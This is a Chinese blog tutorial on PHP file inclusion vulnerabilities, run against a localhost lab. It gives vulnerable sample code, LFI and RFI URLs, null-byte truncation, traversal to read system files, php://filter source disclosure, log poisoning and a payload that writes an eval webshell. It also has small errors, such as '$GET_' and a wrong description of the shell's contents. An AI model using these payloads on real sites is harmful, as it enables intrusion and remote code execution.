[渗透测试]:文件包含

[渗透测试]:文件包含

 
文件包含
 
文件包含漏洞
 
    留言    连接数据库
 
    查看留言    连接数据库
 
    登录    连接数据库
 
    注册    连接数据库
 
    代码的重复
 
    连接数据库 放在单独的文件
 
 
程序开发人员通常会把可重复使用的函数写到单个文件中,使用某个函数的时候,直接调用此文件,无需再次编写,这种调用文件的过程通常称为包含
 
程序开发人员都希望代码更加灵活,所以通常会把被包含的文件设置为变量,来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用任意文件,造成文件包含漏洞
 
几乎所有的脚本语言都会提供文件包含功能。文件包含漏洞在PHP Web Application 中居多,在JSP/ASP/ASP.net程序中比较少。本文以PHP 为例,说明文件包含漏洞
 
漏洞产生原因
 
1、Web 应用实现了动态包含
 
2、动态包含的文件路径参数,客户端可控
 
PHP中的文件包含
 
*语句
 
PHP 中提供了四个文件包含的函数,四个函数之间略有区别
 
函数
区别
include()    
文件包含失败,会产生警告,脚本会继续执行
include_once()
与include() 功能相同,文件只会被包含一次
require() 
文件包含失败时,会产生错误,直接结束脚本执行
require_once()    
与require() 功能相同 ,文件只会被包含一次
 
*相关配置
 
文件包含是PHP 的基本功能之一,有本地文件包含和远程文件包含之分(虽然PHP 官网上不是这么解释的)。简单来说,本地文件包含就是可以读取和打开本地文件,远程文件包含(HTTP,FTP,PHP 伪协议)就是可以远程加载文件。我们可以通过php.ini 配置文件来进行配置。
 
    allow_url_fopen=On/Off
 
    本地文件包含(LFI)
 
    allow_url_include=On/Off
 
    远程文件包含(RFI)
 
*文件包含示例
 
我们可以通过以下简单代码来测试文件包含漏洞
 
 
    -----------
 
    <?php
 
    $path=$GET_['path'];
 
    include_once("./inc.php");
 
    echo "<h1>This is inlcude_once.php!</h1>";
 
    include_once $path;
 
    ?>
 
    ----------
 
*本地文件包含(LFI)
 
本地文件包含就是我们通过相对路径的方式找到文件,然后包含url
 
[http://localhost/include/include_once.php?path=info.php]
 
*远程文件包含(RFI)
 
远程文件包含就是我们可以通过http(s)或者ftp 等方式,远程加载文件url
 
[http://localhost/include/include_once.php?path=http://192.168.1.200/include/info.php]
 
[http://localhost/include/include_once.php?path=ftp://admin:123.com@192.168.1.2/info.php]
 
漏洞原理及特点
 
PHP 文件包含是程序设计的基础功能之一,能够减少代码量,提高开发效率。但是使用文件包含功能是,有类似以上测试代码的设计,实现动态包含,就会有文件包含漏洞的风险。如果实现动态包含的参数,Web 应用没有进行严格的净化,客户端可以影响或控制文件包含的路径,就会产生文件包含漏洞。
 
*特点
 
PHP 提供的文件包含功能非常强大,有以下特点
 
@ 无视文件扩展名读取文件
 
包含文件时,PHP 会读取文件的源码,包括图片文件。尝试包含图片
 
[http://localhost/include/include_once.php?path=simle.jpg]
 
我们会发现打开图片不是图像而是图片的源码
 
@ 无条件解析PHP 代码
 
文件包含在读取文件源码的同时,如果遇到符合PHP 语法规范的代码,就会无条件执行。例如将info.php的后缀名改成info.rar,依然能够显示phpinfo() 的信息。
 
与此同时,也为图片木马提供了一种利用的方法
 
空字符安全绕过
 
空字符安全限制绕过,是PHP 小于5.3.4 版本的一个漏洞,CVE编号是CVE-2006-7243.这个漏洞就是PHP 接收来自于路径名中的空(NULL)字符,这可能允许依赖于上下文的攻击者通过在此字符后放置安全文件扩展名来绕过预期的访问限制,这就是我们之前讲过的00 截断。00 截断攻击也会体现在文件包含中。
 
Web 应用在设计的时候,经常会包含模版文件,简单程序如下
 
    -----------------
 
    <?php
 
    if(isset($_GET['path'])){
 
        include $_GET['path'].".html";
 
    }else{
 
        echo "?path=[path]";
 
    }
 
    ?>
 
    ----------------
 
这个简单的代码限制了被包含的文件的后缀名是html
 
[http://localhost/include/00/?path=info]
 
此处我们通过00 截断来包含任意文件,比如同级目录下的inc.php 文件。提交变量
 
[http:localhost/incldue/00/?path=info.php%00]
 
    注意:要想本实验成功需要关闭魔术引号
 
    magic_quotes_gpc=Off
 
文件包含漏洞的利用
 
*读取敏感文件
 
    我们可以利用文件包含漏洞读取任意文件,读取文件的时候有利用条件
 
    @ 目标主机存在(目标文件的路径,绝对路径,相对路径)
 
    @ 具有文件可读权限
 
    提交参数,读取本地host 文件
 
    [?path=c:\windows\System32\drivers\etc\hosts]
 
    [?path=..\..\..\..\..\..\windows\System32\drivers\etc\hosts]
 
*直接包含图片木马
 
    可以利用文件包含漏洞直接包含图片木马
 
    [?path=pingYjh.png]
 
    使用菜刀或蚁剑连接
 
*包含木马写shell
 
    我们可以将如下代码写入图片中
 
    <?php fputs(fopen('shell.php','w'),"<?php @eval($_REQUEST['cmd']);?>");?>
 
    该段代码的含义是,在当前目录下创建一个名为[shell.php] 的文件,内容为[<?php phpinfo();?>],当我们直接包含图片的时候,这段代码就会被执行了。
 
*PHP 封装协议--访问本地文件
 
    我们可以使用php 的file 协议访问本地系统文件,提交参数
 
    [?path=file://c:\windows\System32\drivers\etc\hosts]
 
*PHP 封装协议--传输PHP 文件
 
    可以使用以下参数来传送任意PHP 文件
 
    [?path=php://filter/read=convert.base64-encode/resource=./inc.php]
 
    然后将获取到的字符串进行base64 解码即可
 
    获取网站的源码
 
*PHP 封装协议--执行PHP 命令
 
    我们还可以利用PHP 的封装协议来执行PHP 命令
 

image

 
    注:后面两个必须要在开启远程文件上传配置的情况下
 
 
    !已知一个网站存在本地文件包含漏洞,没有我呢间上传API,如何利用?
 
        1、包含本地日志文件getshell
 
            日志文件的路径
 

image

            [?path=c:\phpstudy\apache\log\error.log]
 
            用蚁剑连接    
 
        2、包含session 文件,造成sessionId 泄露
 
      !metinfov5.0.4 文件包含漏洞代码审计
 
posted @ 2021-06-23 17:48  jpSpaceX  阅读(245)  评论(0编辑  收藏  举报